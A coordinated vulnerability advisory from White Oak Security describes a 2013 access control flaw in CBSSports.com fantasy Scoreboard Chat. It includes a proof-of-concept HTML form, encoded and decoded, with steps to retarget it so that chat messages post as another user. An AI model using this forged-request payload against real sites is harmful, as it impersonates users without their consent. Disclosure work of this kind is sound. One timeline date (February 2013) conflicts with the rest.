CBSSports.com Horizontal Access Control Bypass (Scoreboard Chat)

Summary
=========
The CBSSports.com fantasy sports sites did not properly enforce access control between user accounts at the same privilege level within the application. This behavior could be leveraged by an attacker to post messages to the Scoreboard Chat as an opposing team without the opposing team’s interaction, knowledge, or consent.

CVE number: Not Assigned
Impact: Medium
Vendor homepage: http://www.cbssports.com/
Vendor notified: 08/25/2013
Vendor fixed: 09/26/2013
Credit: Christopher Emerson of White Oak Security (http://www.whiteoaksecurity.com/)

Affected Products
=================
Confirmed in CBS Sports Fantasy Football and Fantasy Baseball properties. Other fantasy sports sites may have also been affected.

Details
=======
CBSSports.com fantasy sites allow authenticated users to perform sensitive actions without verifying that the user actually invoked the actions.  In this instance, a CBSSports.com customer can submit requests to the application on behalf of other legitimate users.

Impact
=======
A malicious user could post Scoreboard Chat messages as an opposing team's owner without the opposing team’s interaction, knowledge, or consent.   

Solution
======== 
Enforce proper access control between user accounts at the same privilege level within the application. Implement access control decisions based on the permissions granted to the authenticated user associated with the submitted session identifier.

Proof-of-Concept 
================
The following HTML form is included as a Proof-of-Concept (PoC).

To reproduce this in your own environment, the proof of concept will need to be modified as detailed below.

<html>
<body>
<form action="http://vanilla.baseball.cbssports.com/data/chat/store-message?client_type=scoreboardChat.openbaseball.mgmt" method="POST">
<input type="hidden" name="chat&#95;domain" value="vanilla&#46;baseball&#46;cbssports&#46;com" />
<input type="hidden" name="chat&#95;msg" value="&#123;&quot;event&quot;&#58;&quot;public&quot;&#44;&quot;from&quot;&#58;&quot;the_mcsass&#64;vanilla&#46;baseball&#46;cbssports&#46;com&quot;&#44;&quot;payload&quot;&#58;&#123;&quot;body&quot;&#58;&quot;Sharknado2&#92;n&quot;&#125;&#44;&quot;to&quot;&#58;&quot;vanilla&#46;baseball&#46;cbssports&#46;com&quot;&#44;&quot;type&quot;&#58;&quot;message&quot;&#125;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

  1. Change URL to the target league.
  2. Change the username value to the target user's username.
  3. Insert the message you want posted.

This file, or a link to a web hosted version of the file, can be opened by the malicious user.  When the file is opened, the request inherits the identity and privileges of the user. 

A decoded version of the request above is included to make it a little easier to read.

<html>
<body>
<form action="http://vanilla.baseball.cbssports.com/data/chat/store-message?client_type=scoreboardChat.openbaseball.mgmt" method="POST">
<input type="hidden" name="chat_domain" value="vanilla.baseball.cbssports.com" />
<input type="hidden" name="chat_msg" value="{"event":"public","from":"the_mcsass@vanilla.baseball.cbssports.com","payload":{"body":"Sharknado2\n"},"to":"vanilla.baseball.cbssports.com","type":"message"}" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Disclosure Timeline
==================
August 25, 2013: Disclosed to vendor (CBS Corporation).
August 26, 2013: Vendor’s initial response.
February 22, 2013: Vendor stated vulnerability had been remediated and a Responsible Disclosure policy was being drafted.
September 26, 2013: Confirmed successful vendor remediation.
September 26, 2013: Received vendor's Responsible Disclosure Policy.
September 30, 2013:  Disclosed vulnerability publicly

 

Christopher Emerson